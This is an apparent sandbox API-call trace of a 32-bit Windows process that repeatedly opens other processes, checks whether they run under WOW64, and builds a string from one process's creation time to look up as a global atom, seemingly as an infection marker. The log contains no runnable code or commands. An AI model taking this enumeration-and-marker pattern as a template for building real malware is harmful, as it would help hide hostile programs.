	[0110.675] CloseHandle (hObject=0x694) returned 1
	[0110.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0110.675] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.675] CloseHandle (hObject=0x694) returned 1
	[0110.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0110.675] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.675] CloseHandle (hObject=0x694) returned 1
	[0110.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0110.675] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.675] CloseHandle (hObject=0x694) returned 1
	[0110.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0110.676] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.676] CloseHandle (hObject=0x694) returned 1
	[0110.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0110.676] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.676] CloseHandle (hObject=0x694) returned 1
	[0110.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0110.676] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.676] CloseHandle (hObject=0x694) returned 1
	[0110.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0110.676] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.676] CloseHandle (hObject=0x694) returned 1
	[0110.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0110.676] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.676] CloseHandle (hObject=0x694) returned 1
	[0110.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0110.677] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.677] CloseHandle (hObject=0x694) returned 1
	[0110.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0110.677] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.677] CloseHandle (hObject=0x694) returned 1
	[0110.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0110.677] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.677] CloseHandle (hObject=0x694) returned 1
	[0110.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0110.677] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.677] CloseHandle (hObject=0x694) returned 1
	[0110.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0110.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.678] CloseHandle (hObject=0x694) returned 1
	[0110.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0110.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.678] CloseHandle (hObject=0x694) returned 1
	[0110.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0110.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.678] CloseHandle (hObject=0x694) returned 1
	[0110.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0110.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.678] CloseHandle (hObject=0x694) returned 1
	[0110.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0110.678] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.679] CloseHandle (hObject=0x694) returned 1
	[0110.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.679] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.679] CloseHandle (hObject=0x694) returned 1
	[0110.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.679] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.679] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0110.680] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0110.680] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0110.680] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.680] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0110.680] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.680] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0110.681] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0110.681] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0110.681] CloseHandle (hObject=0x694) returned 1
	[0110.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0110.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0110.681] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.681] CloseHandle (hObject=0x694) returned 1
	[0110.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0110.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.685] CloseHandle (hObject=0x694) returned 1
	[0110.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0110.685] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.685] CloseHandle (hObject=0x694) returned 1
	[0110.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0110.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0110.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0110.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0110.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0110.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0110.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0110.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0110.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0110.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0110.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0110.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0110.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0110.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0110.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0110.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0110.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0110.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0110.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0110.823] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.823] CloseHandle (hObject=0x694) returned 1
	[0110.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0110.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0110.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0110.824] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.824] CloseHandle (hObject=0x694) returned 1
	[0110.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0110.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0110.824] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.824] CloseHandle (hObject=0x694) returned 1
	[0110.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0110.825] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.825] CloseHandle (hObject=0x694) returned 1
	[0110.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0110.825] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.825] CloseHandle (hObject=0x694) returned 1
	[0110.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0110.825] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.825] CloseHandle (hObject=0x694) returned 1
	[0110.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0110.825] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.825] CloseHandle (hObject=0x694) returned 1
	[0110.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0110.825] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.825] CloseHandle (hObject=0x694) returned 1
	[0110.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0110.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0110.826] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.826] CloseHandle (hObject=0x694) returned 1
	[0110.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0110.826] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.826] CloseHandle (hObject=0x694) returned 1
	[0110.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0110.826] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.826] CloseHandle (hObject=0x694) returned 1
	[0110.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0110.826] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.827] CloseHandle (hObject=0x694) returned 1
	[0110.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0110.827] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.827] CloseHandle (hObject=0x694) returned 1
	[0110.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0110.827] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.827] CloseHandle (hObject=0x694) returned 1
	[0110.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0110.827] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.827] CloseHandle (hObject=0x694) returned 1
	[0110.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0110.827] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.827] CloseHandle (hObject=0x694) returned 1
	[0110.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0110.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.828] CloseHandle (hObject=0x694) returned 1
	[0110.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0110.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.828] CloseHandle (hObject=0x694) returned 1
	[0110.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0110.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.828] CloseHandle (hObject=0x694) returned 1
	[0110.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0110.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.828] CloseHandle (hObject=0x694) returned 1
	[0110.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0110.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.828] CloseHandle (hObject=0x694) returned 1
	[0110.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0110.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.829] CloseHandle (hObject=0x694) returned 1
	[0110.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0110.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.829] CloseHandle (hObject=0x694) returned 1
	[0110.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0110.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.829] CloseHandle (hObject=0x694) returned 1
	[0110.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0110.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.829] CloseHandle (hObject=0x694) returned 1
	[0110.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0110.830] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.830] CloseHandle (hObject=0x694) returned 1
	[0110.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0110.831] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.831] CloseHandle (hObject=0x694) returned 1
	[0110.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0110.831] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.831] CloseHandle (hObject=0x694) returned 1
	[0110.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0110.831] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.831] CloseHandle (hObject=0x694) returned 1
	[0110.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0110.832] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.832] CloseHandle (hObject=0x694) returned 1
	[0110.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.832] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.832] CloseHandle (hObject=0x694) returned 1
	[0110.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.832] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.832] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0110.833] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0110.833] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0110.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.833] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0110.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.834] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0110.834] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0110.834] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0111.063] CloseHandle (hObject=0x694) returned 1
	[0111.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0111.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0111.063] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.064] CloseHandle (hObject=0x694) returned 1
	[0111.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0111.064] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.064] CloseHandle (hObject=0x694) returned 1
	[0111.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0111.064] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.064] CloseHandle (hObject=0x694) returned 1
	[0111.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0111.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0111.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0111.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0111.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0111.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0111.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0111.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0111.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0111.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0111.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0111.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0111.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0111.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0111.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0111.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0111.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0111.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0111.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0111.165] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.165] CloseHandle (hObject=0x694) returned 1
	[0111.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0111.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0111.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0111.166] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.166] CloseHandle (hObject=0x694) returned 1
	[0111.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0111.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0111.166] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.166] CloseHandle (hObject=0x694) returned 1
	[0111.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0111.166] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.166] CloseHandle (hObject=0x694) returned 1
	[0111.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0111.166] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.166] CloseHandle (hObject=0x694) returned 1
	[0111.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0111.167] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.167] CloseHandle (hObject=0x694) returned 1
	[0111.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0111.167] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.167] CloseHandle (hObject=0x694) returned 1
	[0111.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0111.167] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.167] CloseHandle (hObject=0x694) returned 1
	[0111.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0111.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0111.167] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.167] CloseHandle (hObject=0x694) returned 1
	[0111.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0111.168] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.168] CloseHandle (hObject=0x694) returned 1
	[0111.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0111.168] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.168] CloseHandle (hObject=0x694) returned 1
	[0111.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0111.168] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.168] CloseHandle (hObject=0x694) returned 1
	[0111.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0111.168] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.168] CloseHandle (hObject=0x694) returned 1
	[0111.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0111.168] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.169] CloseHandle (hObject=0x694) returned 1
	[0111.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0111.169] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.169] CloseHandle (hObject=0x694) returned 1
	[0111.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0111.169] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.169] CloseHandle (hObject=0x694) returned 1
	[0111.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0111.169] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.169] CloseHandle (hObject=0x694) returned 1
	[0111.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0111.169] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.169] CloseHandle (hObject=0x694) returned 1
	[0111.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0111.170] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.170] CloseHandle (hObject=0x694) returned 1
	[0111.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0111.170] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0111.170] CloseHandle (hObject=0x694) returned 1
